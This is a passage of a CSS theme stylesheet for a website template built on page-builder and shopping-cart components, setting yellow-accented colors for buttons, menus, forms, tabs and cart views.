.btn-readmore:focus {
  color: #fff;
}
.btn-dark,
.sppb-btn-dark {
  color: #fff;
  border-color: #4d4d4d;
  background-color: rgba(51,51,51,0.72);
}
.btn-dark:hover,
.btn-dark:focus,
.sppb-btn-dark:hover,
.sppb-btn-dark:focus {
  color: #eee;
  border-color: #333;
  background-color: #424242;
  background-color: rgba(51,51,51,0.87);
}
.btn-dark.sppb-btn-outline,
.sppb-btn-dark.sppb-btn-outline {
  border-color: #333;
}
.btn-dark.sppb-btn-outline:hover,
.btn-dark.sppb-btn-outline.focus,
.btn-dark.sppb-btn-outline.active,
.btn-dark.sppb-btn-outline:focus,
.btn-dark.sppb-btn-outline:active,
.btn-dark.open > .dropdown-toggle.sppb-btn-outline,
.sppb-btn-dark.sppb-btn-outline:hover,
.sppb-btn-dark.sppb-btn-outline.focus,
.sppb-btn-dark.sppb-btn-outline.active,
.sppb-btn-dark.sppb-btn-outline:focus,
.sppb-btn-dark.sppb-btn-outline:active,
.sppb-btn-dark.open > .dropdown-toggle.sppb-btn-outline {
  color: #eee;
  border-color: #333;
  background-color: #535353;
  background-color: rgba(51,51,51,0.8);
}
.btn-dark.sppb-btn-3d,
.btn-dark.sppb-btn-3d:hover,
.btn-dark.sppb-btn-3d.focus,
.btn-dark.sppb-btn-3d:focus,
.btn-dark.sppb-btn-3d:active,
.btn-dark.sppb-btn-3d.active,
.btn-dark.open > .dropdown-toggle.sppb-btn-3d,
.sppb-btn-dark.sppb-btn-3d,
.sppb-btn-dark.sppb-btn-3d:hover,
.sppb-btn-dark.sppb-btn-3d.focus,
.sppb-btn-dark.sppb-btn-3d:focus,
.sppb-btn-dark.sppb-btn-3d:active,
.sppb-btn-dark.sppb-btn-3d.active,
.sppb-btn-dark.open > .dropdown-toggle.sppb-btn-3d {
  border-bottom-color: #262626;
}
.btn-light,
.sppb-btn-light {
  color: #f5f5f5;
  border-color: #f5f5f5;
  border-color: rgba(255,255,255,0.77);
  background-color: rgba(255,255,255,0.05);
}
.btn-light:hover,
.btn-light:focus,
.sppb-btn-light:hover,
.sppb-btn-light:focus {
  border-color: #fff;
  color: #fff;
  background-color: rgba(255,255,255,0.15);
}
.btn-light.sppb-btn-outline,
.sppb-btn-light.sppb-btn-outline {
  color: #f5f5f5;
  border-color: #f5f5f5;
  border-color: rgba(255,255,255,0.77);
}
.btn-light.sppb-btn-outline:hover,
.btn-light.sppb-btn-outline.focus,
.btn-light.sppb-btn-outline:focus,
.btn-light.sppb-btn-outline:active,
.btn-light.sppb-btn-outline.active,
.btn-light.open > .dropdown-toggle.sppb-btn-outline,
.sppb-btn-light.sppb-btn-outline:hover,
.sppb-btn-light.sppb-btn-outline.focus,
.sppb-btn-light.sppb-btn-outline:focus,
.sppb-btn-light.sppb-btn-outline:active,
.sppb-btn-light.sppb-btn-outline.active,
.sppb-btn-light.open > .dropdown-toggle.sppb-btn-outline {
  border-color: #fff;
  color: #fff;
}
.btn-light.sppb-btn-3d,
.sppb-btn-light.sppb-btn-3d {
  border-bottom-color: rgba(255,255,255,0.77);
}
.btn-light.sppb-btn-3d:hover,
.btn-light.sppb-btn-3d.focus,
.btn-light.sppb-btn-3d:focus,
.btn-light.sppb-btn-3d:active,
.btn-light.sppb-btn-3d.active,
.btn-light.open > .dropdown-toggle.sppb-btn-3d,
.sppb-btn-light.sppb-btn-3d:hover,
.sppb-btn-light.sppb-btn-3d.focus,
.sppb-btn-light.sppb-btn-3d:focus,
.sppb-btn-light.sppb-btn-3d:active,
.sppb-btn-light.sppb-btn-3d.active,
.sppb-btn-light.open > .dropdown-toggle.sppb-btn-3d {
  border-bottom-color: #fff;
}
.btn-flex,
.sppb-btn-flex {
  color: #fff;
  border-color: #f9f6b8;
  background-color: rgba(255,255,255,0.25);
  box-shadow: 0 2px 5px rgba(0,0,0,0.15);
}
.btn-flex:hover,
.btn-flex:focus,
.sppb-btn-flex:hover,
.sppb-btn-flex:focus {
  border-color: #f6f2a1;
  color: #fff;
  background-color: rgba(240,233,91,0.7);
}
.btn-flex.sppb-btn-outline,
.sppb-btn-flex.sppb-btn-outline {
  color: #fff;
  border-color: #f9f6b8;
  background-color: rgba(255,255,255,0.25);
}
.btn-flex.sppb-btn-outline:hover,
.btn-flex.sppb-btn-outline.focus,
.btn-flex.sppb-btn-outline:focus,
.btn-flex.sppb-btn-outline:active,
.btn-flex.sppb-btn-outline.active,
.btn-flex.open > .dropdown-toggle.sppb-btn-outline,
.sppb-btn-flex.sppb-btn-outline:hover,
.sppb-btn-flex.sppb-btn-outline.focus,
.sppb-btn-flex.sppb-btn-outline:focus,
.sppb-btn-flex.sppb-btn-outline:active,
.sppb-btn-flex.sppb-btn-outline.active,
.sppb-btn-flex.open > .dropdown-toggle.sppb-btn-outline {
  border-color: #f6f2a1;
  color: #fff;
  background-color: rgba(240,233,91,0.7);
}
.btn-flex.sppb-btn-3d,
.btn-flex.sppb-btn-3d:hover,
.btn-flex.sppb-btn-3d.focus,
.btn-flex.sppb-btn-3d:focus,
.btn-flex.sppb-btn-3d:active,
.btn-flex.sppb-btn-3d.active,
.btn-flex.open > .dropdown-toggle.sppb-btn-3d,
.sppb-btn-flex.sppb-btn-3d,
.sppb-btn-flex.sppb-btn-3d:hover,
.sppb-btn-flex.sppb-btn-3d.focus,
.sppb-btn-flex.sppb-btn-3d:focus,
.sppb-btn-flex.sppb-btn-3d:active,
.sppb-btn-flex.sppb-btn-3d.active,
.sppb-btn-flex.open > .dropdown-toggle.sppb-btn-3d {
  border-bottom-color: #f4ef8a;
}
.light >i {
  color: #fbf9d0;
}
.light:hover i {
  color: #fdfce7;
}
ul.social-icons >li a:hover,
ul.social-icons >li a:hover > i {
  -webkit-transition: all 300ms;
  transition: all 300ms;
  color: #fdfce7;
}
.login .title i.pe,
.registration .title i.pe {
  color: #f9f6b8;
}
.ap-login a i.pe,
.ap-signin a i.pe {
  color: #f9f6b8;
}
.ap-modal-login .modal-dialog {
  color: #000000;
}
.ap-modal-login .title i.pe {
  color: #f9f6b8;
}
.ap-modal-login .modal-content .modal-body .forget-name-link a {
  color: #000000 !important;
}
.ap-modal-login .modal-content .modal-body .forget-name-link a:hover {
  color: #f0e95b !important;
}
.ap-modal-login .modal-content .modal-footer a:hover {
  color: #f0e95b !important;
}
.view-profile .select-menu select {
  display: block;
}
.view-profile button:focus {
  outline: none;
}
.view-profile a[title="Cancel"] {
  background-color: #888888;
  color: #fff;
}
.view-profile a[title="Cancel"]:hover {
  background-color: #6f6f6f;
}
.ap-my-account-menu .signin-img-wrap i.pe {
  color: #fdfce7;
}
.ap-my-account-menu .dropdown-menu ul.menu >li a {
  color: #000000 !important;
}
.ap-my-account-menu .dropdown-menu ul.menu >li a:hover {
  background-color: rgba(240,233,91,0.8);
  color: #fff !important;
}
.ap-my-account-menu .dropdown-menu ul.menu >li a:hover::before {
  color: #fdfce7;
}
.ap-my-account-menu .dropdown-menu ul.menu >li:last-child a {
  color: #f0e95b;
}
.ap-my-account-menu .dropdown-menu ul.menu >li:last-child a:hover {
  background-color: rgba(240,233,91,0.8);
  color: #fff;
}
.ap-my-account-menu .dropdown-menu ul.menu >li:last-child a:hover i {
  color: #fff;
}
.ap-my-account-menu .dropdown-menu ul.menu >li:last-child a i {
  color: #f0e95b;
}
.ap-my-account-menu .dropdown-menu ul.menu >li.active > a {
  background-color: rgba(240,233,91,0.8);
  color: #fff !important;
}
.login-wrapper >i.pe,
.registration-wrapper >i.pe,
.reset-wrapper >i.pe,
.remind-wrapper >i.pe {
  color: rgba(240,233,91,0.07);
}
.login-wrapper >i.pe {
  color: rgba(85,85,85,0.02);
}
#sp-top-bar ul.social-icons >li a:hover,
#sp-top-bar ul.social-icons >li a:hover > i {
  -webkit-transition: all 300ms;
  transition: all 300ms;
  color: #f2ec72;
}
#sp-top-bar.onepage {
  box-shadow: inset 0 1px 0px rgba(0,0,0,0.05), inset 0 -1px 0px rgba(0,0,0,0.1);
}
#sp-top-bar.onepage .sp-contact-info li i {
  color: #ebe123;
}
#sp-top-bar.onepage .ap-login a i.pe,
#sp-top-bar.onepage .ap-signin a i.pe {
  color: #ebe123;
}
.sp-contact-info li a:hover {
  color: #f6f2a1;
}
.sp-contact-info li i {
  color: #f6f2a1;
}
.sp-module-content .mod-languages ul.lang-block li.lang-active a i {
  color: #f9f6b8;
}
ol.breadcrumb li a:hover {
  color: #fbf9d0;
}
.sp-module ul >li >a,
.sppb-addon-module ul >li >a {
  color: #1a1a1a;
}
.sp-module ul >li >a:hover,
.sppb-addon-module ul >li >a:hover {
  color: #f0e95b;
}
.sp-module.white .sppb-addon-content ol >span,
.sppb-addon-module.white .sppb-addon-content ol >span {
  color: #e2e2e2;
}
.sp-module.white .sppb-addon-content ol li,
.sppb-addon-module.white .sppb-addon-content ol li {
  color: #e2e2e2;
}
.sp-module.white .sppb-addon-content ol li a,
.sppb-addon-module.white .sppb-addon-content ol li a {
  color: #fff;
}
.sp-module.white .sppb-addon-content ol li a:hover,
.sppb-addon-module.white .sppb-addon-content ol li a:hover {
  color: #fbf9d0;
}
.sp-module.dark ul >li >span >a,
.sppb-addon-module.dark ul >li >span >a {
  color: #f2ec72;
}
.sp-module.dark ul >li >span >a:hover,
.sppb-addon-module.dark ul >li >span >a:hover {
  color: #f9f6b8;
}
.sp-module.dark ul >li >a,
.sppb-addon-module.dark ul >li >a {
  color: #f4ef8a !important;
}
.sp-module.dark ul >li >a:hover,
.sppb-addon-module.dark ul >li >a:hover {
  color: #fbf9d0 !important;
}
.sp-module .latestnews >div >a,
.sppb-addon-module .latestnews >div >a {
  color: #000000;
}
.sp-module .latestnews >div >a:hover,
.sppb-addon-module .latestnews >div >a:hover {
  color: #f0e95b;
}
.sp-module ul.category-module >li >a,
.sp-module .relateditems >li >a,
.sppb-addon-module ul.category-module >li >a,
.sppb-addon-module .relateditems >li >a {
  color: #f4ef8a;
}
.sp-module ul.category-module >li >a >div.related-date,
.sp-module .relateditems >li >a >div.related-date,
.sppb-addon-module ul.category-module >li >a >div.related-date,
.sppb-addon-module .relateditems >li >a >div.related-date {
  color: #999999;
}
.sp-module ul.category-module >li >a >div.related-date >i,
.sp-module .relateditems >li >a >div.related-date >i,
.sppb-addon-module ul.category-module >li >a >div.related-date >i,
.sppb-addon-module .relateditems >li >a >div.related-date >i {
  color: #f9f6b8;
}
.sp-module ul.category-module >li span,
.sp-module ul.category-module >li p,
.sp-module .relateditems >li span,
.sp-module .relateditems >li p,
.sppb-addon-module ul.category-module >li span,
.sppb-addon-module ul.category-module >li p,
.sppb-addon-module .relateditems >li span,
.sppb-addon-module .relateditems >li p {
  color: #999999;
}
.sp-module ul.category-module >li span >i,
.sp-module ul.category-module >li p >i,
.sp-module .relateditems >li span >i,
.sp-module .relateditems >li p >i,
.sppb-addon-module ul.category-module >li span >i,
.sppb-addon-module ul.category-module >li p >i,
.sppb-addon-module .relateditems >li span >i,
.sppb-addon-module .relateditems >li p >i {
  color: #f9f6b8;
}
.sp-module ul.category-module >li a.mod-articles-category-title,
.sppb-addon-module ul.category-module >li a.mod-articles-category-title {
  color: #000000;
}
.sp-module ul.category-module >li a.mod-articles-category-title:hover,
.sppb-addon-module ul.category-module >li a.mod-articles-category-title:hover {
  color: #f0e95b;
}
.sp-module .tagscloud .tag-name,
.sppb-addon-module .tagscloud .tag-name {
  color: #666666;
}
.sp-module .tagscloud .tag-name:hover,
.sppb-addon-module .tagscloud .tag-name:hover {
  background: #f2ec72;
  border-color: #f0e95b;
  color: #fff;
}
.tag-category ul.category li h3 >a {
  color: #595959;
}
.tag-category ul.category li h3 >a:hover {
  color: #f0e95b;
}
.tags a.label {
  background-color: rgba(45,45,45,0.45);
}
.tags a.label:hover {
  background: #f2ec72;
}
.tags >span >i {
  color: #c4c4c4;
}
.tags:hover >span >i {
  color: #919191;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.simple > li > a {
  color: #1a1a1a;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.simple > li > a:hover {
  color: #f0e95b;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.simple > li.active > a {
  color: #f0e95b;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.simple > li.active > a:hover {
  color: #f0e95b;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.simple > li span.simple-divider {
  color: #ffffff;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.flex > li.active > a,
#mod-sp-simpleportfolio .sp-simpleportfolio-filter > ul.flex > li.active > a {
  background: #f0e95b;
}
.sp-simpleportfolio .sp-simpleportfolio-filter > ul.flex > li > a:hover,
#mod-sp-simpleportfolio .sp-simpleportfolio-filter > ul.flex > li > a:hover {
  background: #f0e95b;
}
.sp-simpleportfolio .sp-simpleportfolio-item .sp-simpleportfolio-btns a,
#mod-sp-simpleportfolio .sp-simpleportfolio-item .sp-simpleportfolio-btns a {
  background-color: #f0e95b;
  background-color: rgba(240,233,91,0.8);
}
.sp-simpleportfolio .sp-simpleportfolio-item .sp-simpleportfolio-btns a:hover,
#mod-sp-simpleportfolio .sp-simpleportfolio-item .sp-simpleportfolio-btns a:hover {
  background-color: #f0e95b;
  box-shadow: 0 1px 3px rgba(0,0,0,0.3);
}
.sp-simpleportfolio .sp-simpleportfolio-meta .sp-module:hover h3 > i.fa {
  color: #f0e95b;
}
.sp-simpleportfolio-info .sp-simpleportfolio-tags i.fa {
  color: #f4ef8a;
}
input[type="text"]:focus {
  border: 1px solid #f0e95b;
}
.search input#mod-search-searchword:focus,
.search input#search-searchword:focus,
.search input#mod_virtuemart_search:focus {
  border: 1px solid #f0e95b;
}
.search:before {
  color: #f4ef8a;
}
.search:hover:before,
.search:focus:before,
.search:active:before {
  color: #1a1a1a;
}
.search .btn-toolbar button {
  background: #f0e95b;
}
.post-format-masonry > i {
  background-color: #f0e95b;
  background-color: rgba(240,233,91,0.7);
}
.post-format {
  background-color: #f0e95b;
  background-color: rgba(240,233,91,0.9);
}
.entry-link,
.entry-quote {
  background-color: #f0e95b;
  background-color: rgba(240,233,91,0.9);
}
blockquote {
  border-color: #f0e95b;
}
.sp-comingsoon body {
  background-color: #eee644;
}
.sp-comingsoon body #sp-comingsoon ul.social-icons >li a:hover,
.sp-comingsoon body #sp-comingsoon ul.social-icons >li a:hover i {
  color: #fff;
}
.sp-comingsoon body.with-bckg-img a.logo {
  background: rgba(20,20,20,0.45);
}
.sp-comingsoon body.with-bckg-img .days .number,
.sp-comingsoon body.with-bckg-img .hours .number,
.sp-comingsoon body.with-bckg-img .seconds .number,
.sp-comingsoon body.with-bckg-img .minutes .number {
  border: 1px solid rgba(255,255,255,0.5);
  background-color: rgba(0,0,0,0.2);
}
.sp-comingsoon body.with-bckg-img .social-icons {
  background-color: rgba(0,0,0,0.2);
}
.pagination>li>a,
.pagination>li>span {
  color: #000000;
}
.pagination>li>a:hover,
.pagination>li>a:focus,
.pagination>li>span:hover,
.pagination>li>span:focus {
  color: #000000;
}
.pagination>.active>a,
.pagination>.active>span {
  border-color: #f0e95b;
  background-color: #f0e95b;
}
.pagination>.active>a:hover,
.pagination>.active>a:focus,
.pagination>.active>span:hover,
.pagination>.active>span:focus {
  border-color: #f0e95b;
  background-color: #f0e95b;
}
.sppb-addon h3.sppb-addon-title {
  color: #1a1a1a;
}
.sppb-addon h3.sppb-addon-title:after {
  background: #f4ef8a;
}
.sppb-panel-default .sppb-panel-heading .sppb-panel-title >i {
  color: #666666;
}
.sppb-panel-default .sppb-panel-heading.active,
.sppb-panel-default .sppb-panel-heading.active:before {
  color: #f0e95b;
}
.sppb-panel-default .sppb-panel-heading.active .sppb-panel-title,
.sppb-panel-default .sppb-panel-heading.active:before .sppb-panel-title {
  color: #f0e95b;
}
.sppb-panel-default .sppb-panel-heading.active .sppb-panel-title >i,
.sppb-panel-default .sppb-panel-heading.active:before .sppb-panel-title >i {
  color: #f4ef8a;
}
.sppb-panel-primary {
  border: none;
}
.sppb-panel-primary >.sppb-panel-heading {
  background-color: #f0e95b;
}
.sppb-panel-flex >.sppb-panel-heading .sppb-panel-title >i {
  color: #666666;
}
.sppb-panel-flex >.sppb-panel-heading:after {
  color: #808080;
}
.sppb-panel-flex >.sppb-panel-heading.active {
  border-bottom: 1px solid #f0e95b;
}
.sppb-panel-flex >.sppb-panel-heading.active:after {
  color: #f0e95b;
}
.sppb-panel-flex >.sppb-panel-heading.active .sppb-panel-title >i {
  color: #f0e95b;
}
.sppb-panel-flex >.sppb-panel-heading +.sppb-panel-collapse > .sppb-panel-body {
  border-bottom: 1px solid #f0e95b;
}
.sppb-addon-countdown.flex .sppb-countdown-number {
  background-color: #f0e95b;
  border: 2px solid rgba(0,0,0,0.2);
  text-shadow: 1px 1px 1px rgba(0,0,0,0.3);
}
.entry-header h1 a,
.entry-header h2 a {
  color: #000000;
}
.entry-header h1 a:hover,
.entry-header h1 a:focus,
.entry-header h2 a:hover,
.entry-header h2 a:focus {
  color: #f0e95b;
}
.entry-header h1:after,
.entry-header h2:after {
  background: #f4ef8a;
}
.html-style span {
  background: #f3ee80;
}
ul.site-list li {
  color: #000000;
}
ul.site-list li i {
  color: #f3ee80;
}
.bullets .li-circle {
  color: #f0e95b;
}
.dropcaps .naked-drop span {
  color: #f0e95b;
}
.dropcaps .full-drop span {
  background: #f0e95b;
}
.sp-module .sp-module-title {
  color: #1a1a1a;
}
.sp-module .sp-module-title:after {
  background: #f4ef8a;
}
.cd-pagination li.active >a {
  background-color: #f0e95b;
  color: #fff;
}
.cd-pagination a {
  background-color: #fafafa;
}
.cd-pagination a:hover,
.cd-pagination a:focus {
  background-color: #f0e95b;
  color: #fff;
}
.cd-pagination a:active {
  background-color: #d2c913;
}
.sppb-addon-single-image .sppb-addon-content a .overlay >i:before {
  background-color: rgba(240,233,91,0.8);
}
.sppb-addon-single-image .sppb-addon-content a .overlay:after {
  background-color: rgba(51,51,51,0.25);
  box-shadow: inset 0 0 50px rgba(51,51,51,0.9);
}
.sppb-progress .sppb-progress-bar-default,
.sppb-progress .sppb-progress-bar.flex,
.sppb-progress .sppb-progress-bar.custom {
  background-color: #f0e95b;
}
.sppb-nav-tabs >li >a {
  color: #f0e95b;
}
.sppb-nav-tabs >li.active >a {
  color: #333333;
}
.flex .sppb-tab .sppb-nav-tabs >li.active >a {
  border-top-color: #f4ef8a;
}
.flex .sppb-tab .sppb-nav-tabs >li.active >a:hover,
.flex .sppb-tab .sppb-nav-tabs >li.active >a:focus {
  border-top-color: #f4ef8a;
}
.sppb-nav-modern >li >a {
  background: transparent;
  color: #333333;
}
.sppb-nav-modern >li.active >a {
  color: #f0e95b;
}
.sppb-nav-modern >li.active >a:hover,
.sppb-nav-modern >li.active >a:focus {
  color: #f0e95b;
}
.sppb-nav-lines >li >a {
  background: transparent;
}
.sppb-nav-lines >li >a >i {
  color: #666666;
}
.sppb-nav-lines >li >a:hover >i,
.sppb-nav-lines >li >a:focus >i {
  color: #333333;
}
.sppb-nav-lines >li.active >a,
.sppb-nav-lines >li.active >a:focus,
.sppb-nav-lines >li.active >a:hover {
  background-color: transparent;
  color: #f0e95b;
  border-bottom-color: #f0e95b;
}
.sppb-nav-lines >li.active >a >i,
.sppb-nav-lines >li.active >a:focus >i,
.sppb-nav-lines >li.active >a:hover >i {
  color: #f0e95b;
}
.sppb-nav-pills >li >a {
  color: #333333;
  background: transparent;
}
.sppb-nav-pills >li >a >i {
  color: #666666;
}
.sppb-nav-pills >li >a:hover >i,
.sppb-nav-pills >li >a:focus >i {
  color: #333333;
}
.sppb-nav-pills >li.active >a {
  background-color: transparent;
  color: #f0e95b;
  box-shadow: inset 0 0 0 1px #f0e95b;
}
.sppb-nav-pills >li.active >a >i {
  color: #f0e95b;
}
.sppb-addon-testimonial .sppb-addon-testimonial-rating i.fa-star {
  color: #f4ef8a;
}
.sppb-addon-testimonial .sppb-addon-testimonial-rating i.fa-star-o {
  color: #c0c0c0;
}
.pro-client-url {
  color: #f0e95b;
}
.sppb-pricing-box {
  box-shadow: inset 0 0 1px #999999;
}
.sppb-pricing-box.sppb-pricing-featured {
  background: transparent;
}
.sppb-pricing-box.sppb-pricing-featured .sppb-pricing-header {
  background-color: #f0e95b;
}
.sppb-pricing-box.sppb-pricing-featured .sppb-pricing-features {
  color: #000000;
}
.sppb-addon-latest-posts .latest-post .latest-post-inner div.img-wrapper,
.sppb-addon-latest-posts .latest-post .latest-post-item div.img-wrapper {
  position: relative;
  overflow: hidden;
  max-width: 100%;
}
.sppb-addon-latest-posts .latest-post .latest-post-inner div.img-wrapper >a:after,
.sppb-addon-latest-posts .latest-post .latest-post-item div.img-wrapper >a:after {
  background: #f0e95b;
}
.sppb-addon-latest-posts .latest-post .latest-post-inner h2.entry-title a,
.sppb-addon-latest-posts .latest-post .latest-post-item h2.entry-title a {
  color: #404040;
}
.sppb-addon-latest-posts .latest-post .latest-post-inner:hover h2.entry-title a,
.sppb-addon-latest-posts .latest-post .latest-post-item:hover h2.entry-title a {
  color: #f0e95b;
}
.light .sppb-selector span i {
  color: #fdfce7;
}
.light .sppb-selector >i {
  color: #fbf9d0;
}
.light .sppb-selector:hover span i {
  color: #fff;
}
.light .sppb-selector:hover i {
  color: #fdfce7;
}
.flex .sppb-addon-content .gm-zoom-in,
.flex .sppb-addon-content .gm-zoom-out {
  background-color: #f4ef8a;
  opacity: 0.77;
}
.flex .sppb-addon-content .gm-zoom-in:hover,
.flex .sppb-addon-content .gm-zoom-out:hover {
  background-color: #f2ec72;
  opacity: 1;
}
.sppb-addon .sppb-icon {
  color: #f0e95b;
  line-height: 1.5;
}
.sppb-media.default >a:hover img.sppb-media-object,
.sppb-media.flex >a:hover img.sppb-media-object {
  border-color: #f0e95b;
}
.sppb-media.default >a:hover >i,
.sppb-media.flex >a:hover >i {
  border-color: #f0e95b;
}
.sppb-media.default >.sppb-media-body >i.fa,
.sppb-media.flex >.sppb-media-body >i.fa {
  color: #fdfce7;
}
.sppb-media footer strong {
  color: #f2ec72;
}
.sp-module .sp-module-title,
.sppb-addon-module .sp-module-title {
  color: #1a1a1a;
}
.sp-module .sp-module-title .divider,
.sppb-addon-module .sp-module-title .divider {
  background: #f4ef8a;
}
.sp-module .divider,
.sppb-addon-module .divider {
  background: #cccccc;
}
.sppb-ajaxt-contact-form .sppb-form-group .sppb-form-control[placeholder]::-webkit-input-placeholder:before {
  color: #f9f6b8;
}
.sppb-ajaxt-contact-form .sppb-form-group .sppb-form-control[placeholder]:focus {
  border: 1px solid #f2ec72;
  box-shadow: 0 0 5px rgba(240,233,91,0.3);
}
.sppb-addon-ajax-contact.dark .sppb-form-group label {
  color: #ddd;
  color: rgba(255,255,255,0.65);
}
.sppb-addon-ajax-contact.dark .sppb-form-control label {
  color: #ddd;
  color: rgba(255,255,255,0.65);
}
.sppb-addon-ajax-contact.dark .sppb-form-control[placeholder] {
  color: #f0f0f0;
  border: 1px solid #999;
  border: 1px solid rgba(200,200,200,0.8);
  background: transparent;
}
.sppb-addon-ajax-contact.dark .sppb-form-control[placeholder]::-moz-placeholder {
  color: rgba(255,255,255,0.65);
}
.sppb-addon-ajax-contact.dark .sppb-form-control[placeholder]::-webkit-input-placeholder {
  color: rgba(255,255,255,0.65);
}
.sppb-addon-ajax-contact.dark .sppb-form-control[placeholder]::-webkit-input-placeholder:before {
  color: #f5f193;
}
.sppb-addon-ajax-contact.dark .sppb-form-control[placeholder]:focus {
  border: 1px solid #f6f2a1;
}
.sppb-addon-ajax-contact.dark .tos label {
  color: #ddd;
  color: rgba(255,255,255,0.65);
}
.sppb-addon-ajax-contact.dark .tos label a {
  color: #f6f2a1;
}
.sppb-addon-ajax-contact.dark .tos label a:hover {
  color: #fbf9d0;
}
.dark .acymailing_form input.inputbox {
  color: #f7f4aa;
}
.dark .acymailing_form input.inputbox:focus {
  border: 1px solid #f6f2a1;
}
.sppb-addon-timeline .sppb-addon-timeline-wrapper:before {
  background-color: #f9f6b8 !important;
}
.sppb-addon-timeline .sppb-addon-timeline-wrapper .timeline-badge:before {
  border: 2px solid #f4ef8a !important;
}
.sppb-addon-timeline .sppb-addon-timeline-wrapper .timeline-badge:after {
  background-color: #f9f6b8 !important;
}
.error-page .error-page-inner >div.container .btn-error {
  background: #f2ec72;
}
.error-page .error-page-inner >div.container .btn-error:hover {
  background: #f0e95b;
}
.error-page .error-page-inner >div.container .fa-exclamation-triangle {
  color: #f6f2a1;
}
.error-page .error-page-inner >div.container .error-code {
  color: #f4ef8a;
}
.error-page .error-page-inner.with-bckg-img div.container .pe-7s-compass {
  color: #fff;
  text-shadow: 1px 3px 6px rgba(0,0,0,0.1);
}
.error-page .error-page-inner.with-bckg-img div.container .error-code {
  color: #f2ec72;
}
.sp-layer h1,
.sp-layer h2,
.sp-layer h3,
.sp-layer h4,
.sp-layer h5,
.sp-layer h6,
.sp-layer i.major_color {
  color: #f2ec72;
}
.sp-button {
  border-color: #f6f2a1 !important;
}
.sp-selected-button {
  background-color: #f0e95b !important;
}
.vmCartModule #cd-lateral-nav .cd-navigation {
  color: #000000;
}
.vmCartModule #cd-lateral-nav .cd-navigation .cart-item .product_name a {
  color: #f0e95b !important;
}
.vmCartModule #cd-lateral-nav .cd-navigation .cart-item .product_name a:hover {
  color: #e9df15 !important;
}
.vmCartModule #cd-lateral-nav .cd-navigation .show-cart {
  color: #fff;
}
.quantity {
  background-color: rgba(240,233,91,0.8);
}
.cd-customization .add-to-cart {
  background-color: #f0e95b;
}
.cd-customization .add-to-cart:hover {
  background-color: #ede53a;
}
.no-touch .cd-customization .add-to-cart:hover {
  background-color: #ede53a;
}
.productdetails-view .vm-product-details-inner .product-price .vm-price-desc+span {
  color: #f0e95b;
}
.productdetails-view .vm-product-details-inner .product-short-description h4 {
  color: #555;
}
.productdetails-view .vm-product-details-inner .product-short-description h4 >i {
  color: #f5f193;
}
.productdetails-view .vm-product-details-inner .product-neighbours a.previous-page:before,
.productdetails-view .vm-product-details-inner .product-neighbours a.previous-page:after,
.productdetails-view .vm-product-details-inner .product-neighbours a.next-page:before,
.productdetails-view .vm-product-details-inner .product-neighbours a.next-page:after {
  color: #fff;
  background: rgba(85,85,85,0.3);
}
.productdetails-view .vm-product-details-inner .product-neighbours a.previous-page:hover:before,
.productdetails-view .vm-product-details-inner .product-neighbours a.previous-page:hover:after,
.productdetails-view .vm-product-details-inner .product-neighbours a.next-page:hover:before,
.productdetails-view .vm-product-details-inner .product-neighbours a.next-page:hover:after {
  background: #f0e95b;
}
.productdetails-view .vm-product-details-inner .product-neighbours .empty-previous-page,
.productdetails-view .vm-product-details-inner .product-neighbours .empty-next-page {
  color: #fff;
  text-shadow: 1px 1px 0px rgba(85,85,85,0.08);
  box-shadow: inset 0 0 0 1px rgba(85,85,85,0.08);
}
.productdetails-view .icons a {
  box-shadow: inset 0 0 0 1px rgba(85,85,85,0.1);
}
.productdetails-view .icons a:hover {
  color: #fff;
  background: rgba(240,233,91,0.8);
}
.productdetails-view .products-desc-tab .nav-tabs >li.active >a {
  background: transparent;
  border-bottom: 1px solid #fff;
  border-right: 1px solid #e2e2e2;
  border-left: 1px solid #e2e2e2;
  box-shadow: 0 -1px 0px #f0e95b;
  border-top: 1px solid rgba(240,233,91,0.8);
}
.productdetails-view .products-desc-tab .tab-content .customer-reviews .list-reviews span.date >i {
  color: #f6f2a1;
}
.empty_cart >i.pe >span {
  color: #fff;
  background-color: rgba(240,233,91,0.35);
}
#fancybox-wrap #fancybox-content .continue_link,
#fancybox-wrap #fancybox-content .showcart {
  color: #fff;
  background-color: #f0e95b;
}
.cart-view input[value="Logout"],
.cart-view input[name="changeShopper"],
.cart-view input[value="Search in shop"] {
  background-color: #f0e95b;
}
.cart-view input[value="Logout"]:hover,
.cart-view input[name="changeShopper"]:hover,
.cart-view input[value="Search in shop"]:hover {
  background: #eee644;
}
.cart-view fieldset.userdata #com-form-login-remember input {
  background-color: #f0e95b;
}
.cart-view fieldset.userdata #com-form-login-remember input:hover {
  background-color: #ece32c;
}
.cart-view .billto-shipto a.details {
  background: #f0e95b;
}
.cart-view .billto-shipto a.details:hover {
  background: #ece32c;
}
.cart-view table.cart-summary tr th {
  background: #f0e95b;
  border: solid 1px #f0e95b;
}
.cart-view table.cart-summary input.details-button {
  background: #f0e95b;
}
.cart-view table.cart-summary .vm2-add_quantity_cart {
  background: #f0e95b;
}
.sectiontableentry1 td a.change-payment {
  color: #f4ef8a;
}
.sectiontableentry1 td a.change-payment:hover {
  color: #f0e95b;
}
.vm-button-correct {
  background-color: #f0e95b;
}
.vm-button-correct:hover {
  background-color: #eee644;
}
.vm-button {
  background-color: #f4ef8a;
}
#com-form-login-remember input.default {
  background: #f0e95b;
}
#com-form-login-remember input.default:hover {
  background: #eee644;
}
.control-buttons .vm-button-correct {
  background-color: rgba(255,255,255,0.75);
  border-color: #666666;
  color: #666666;
}
.control-buttons .vm-button-correct:hover,
.control-buttons .vm-button-correct:focus {
  background-color: rgba(255,255,255,0.95);
  border-color: #f0e95b;
  color: #f0e95b;
}
.control-buttons button.default {
  background: #f0e95b;
}
.control-buttons button.default:hover {
  background: #eee644;
}
span.userfields_info {
  color: #f0e95b;
  border-bottom: 1px solid #f0e95b;
}
.orderby-displaynumber .vm-order-list .orderlistcontainer {
  border: 1px solid rgba(128,128,128,0.2);
}
.orderby-displaynumber .vm-order-list .orderlistcontainer .title:before {
  color: #959595;
}
.orderby-displaynumber .vm-order-list .orderlistcontainer .orderlist {
  border-left: 1px solid rgba(128,128,128,0.3);
  border-right: 1px solid rgba(128,128,128,0.3);
  background: rgba(255,255,255,0.9);
}
.orderby-displaynumber .vm-order-list .orderlistcontainer .orderlist div a {
  color: #000000;
  border-bottom: 1px solid rgba(128,128,128,0.3);
